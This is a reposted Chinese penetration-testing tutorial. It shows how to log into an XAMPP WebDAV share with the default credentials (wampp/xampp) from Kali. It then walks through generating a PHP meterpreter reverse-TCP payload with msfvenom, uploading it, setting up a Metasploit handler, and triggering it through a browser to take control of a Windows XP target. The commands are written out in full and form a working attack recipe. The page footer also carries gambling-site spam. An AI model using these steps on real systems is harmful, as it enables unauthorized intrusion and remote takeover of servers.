安基网 欢乐生肖 安全 攻防案例 查看内容

XAMPP架设了WebDAV分布式文件共享服务,利用默认口令上传小马

2020-2-10 13:44| 投稿: |来自:


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 本文仅用于讨论网络安全技术,以保护信息安全为目的,请勿用于非法用途!无论是在现实中还是在网络上,我都是孤独的! ——嘿客匿名者课前温故在之前xp虚拟机中,我们安装了WEB应用环境平台XAMPP,集成了Apache、php、SQL等web应用。XAMPP里面有一个WebDAV文件夹,在XAMPP里WebDAV作用就是:WebDAV 提 ...

本文仅用于讨论网络安全技术,以保护信息安全为目的,请勿用于非法用途!

无论是在现实中还是在网络上,我都是孤独的!

——嘿客匿名者


课前温故

在之前xp虚拟机中,我们安装了WEB应用环境平台XAMPP,集成了Apache、php、SQL等web应用。XAMPP里面有一个WebDAV文件夹,在XAMPP里WebDAV作用就是:WebDAV 提供了一个简单的方法来实现进行文件共享,向xp的web服务器能够上传、下载、编辑文件。

在维基百科上是如此解释:基于Web的分布式编写和版本控制(WebDAV)是超文本传输协议(HTTP)的扩展,有利于用户间协同编辑和管理存储在网络中服务器的文档。

而WebDAV是XAMPP自带的功能!

通过kali端浏览器访问192.168.31.50:88/webdav,就会直接访问到xampp中的webdav文件测试页面(index.html)

本例说明:我的xp ip是192.168.31.50,但是由于xp在安装xampp时,xampp默认使用的80端口(web端口)和xp中IIS 5服务(IIS 5也在使用这个80端口)冲突了,所以前面的xampp文章,我们修改过xampp的默认端口80,修改成了88端口,所以这里我们要指定:88端口,否则无法访问!(一定要找到前面在xp中安装xampp这一课配置好xampp的端口!)

有测试index。html页面!说明XAMPP存在WebDAV!

登录webdav服务端

XAMPP的webdav既然是一个用于文档共享的服务,那肯定支持上传、下载等命令。

我们xp的XAMPP由于使用默认的用户名wampp、密码是xampp。

我们可以通过kali的Cadaver客户端来连接webdav服务端。

Kali终端使用cadaver成功登陆了xp的webdav文件共享服务。

显示dav:/webdav/>,此时已经进入了webdav的命令行终端,可执行操作:ls、cd、put、search等如上几十种文件操作命令!

我们也可以使用win7的"网络驱动器"进行图形化连接。

添加映射网络驱动

输入默认的口令即可登录webdav远程服务

你会发现计算机处,已经成功映射到了webdav的文件夹,右边就是xp webdav的目录文件,你可以直接使用复制、粘贴、修改、拖动等文件常用操作命令!

利用webdav的默认口令上传可执行脚本

这里,我们采用kali的cadaver客户端命令行来登录,实现"利用webdav的默认口令来"上传可执行脚本!

kali cadaver客户端登录webdav服务

使用默认口令已经成功登录webdav,ls查看了当前webdav的文件,有一张图片,我们可以通过浏览器来访问查看!(浏览器访问就相当于执行打开图片命令!)

如图所示

自己创建一个文本文件

Kali终端下,创建一个文本文件。这个testceshi。txt文本文件就创建成功,在主目录/root下,可以通过cat命令直接查看创建的内容!

在kali的webdav连接终端中使用put命令上传testceshi。txt文件。

已经上传成功!

使用kali浏览器查询该文件内容:

中文乱码,没有关系!

这次上传可执行的木马脚本,进而控制服务器xp

由于xampp安装的都是web应用服务程序。包括phpmyadmin软件,管理数据库文件的。那么就会自动包含php语言组件,也就是说,对方服务器课直接执行以php为后缀的可执行脚本文件!

我们就是要利用webdav上传php类型的木马文件(msf的可执行payload),进而通过浏览器执行它,从而最大程度的控住目标系统最高权限!

但有的webdav服务器只能支持上传,没有权限外部者执行访问,但是今天我们的xp配置是支持运行的。

制作php可执行脚本

Kali终端下:(lhost都是kali本地ip)

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.31.206 LPORT=5555 -f raw >msfjiaoben.php

上传这个木马脚本到webdav服务器文件夹

dav:/webdav/>put msfjiaoben.php

kali端下设置metasploit监听(使用metasploit程序)

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 192.168.31.206

set lport 5555 (和前面的木马脚本lport要一致,不然无法监听回连!)

run

既然开启了metasploit监听,接下来,我们在kali浏览器去访问

http://192。168。31。50:88/webdav/msfjiaoben。php这个木马脚本,然后就会触发远程webdav服务器中的这个脚本执行,此时kali就会得到meterpreter会话,控制了靶机xp!

Kali浏览器运行

http://192.168.31.50:88/webdav/msfjiaoben.php

此时去看看kali的metasploit会话是否建立?

到目前为止,我们学会了利用webdav默认的口令登录了webdav服务,然后上传我们制作的php木马脚本,kali端设置metasploit监听,浏览器运行上述链接脚本,即可实现会话建立。

另外,部分浏览器在运行上述远程代码的时候,虽然能建立meterpreter连接,但是很快就会连接中断,只能说上文提供的是一种思路,并不保证一定建立meterpreter会话!

kali嘿客我想说

想学习kali渗透、web渗透、安卓渗透等嘿客攻防技术,关注作者—小白嘿客,私信我回复"hack”。欢迎在下方评论区留言讨论!



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/i6791315859731120652/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

相关阅读

最新评论

 最新
返回顶部
盛通彩票 幸运赛车 上海时时乐 幸运飞艇官网 北京幸运28 极速3分彩 幸运赛车 彩票高賠率好平台 澳门最有名彩票网站 三分时时彩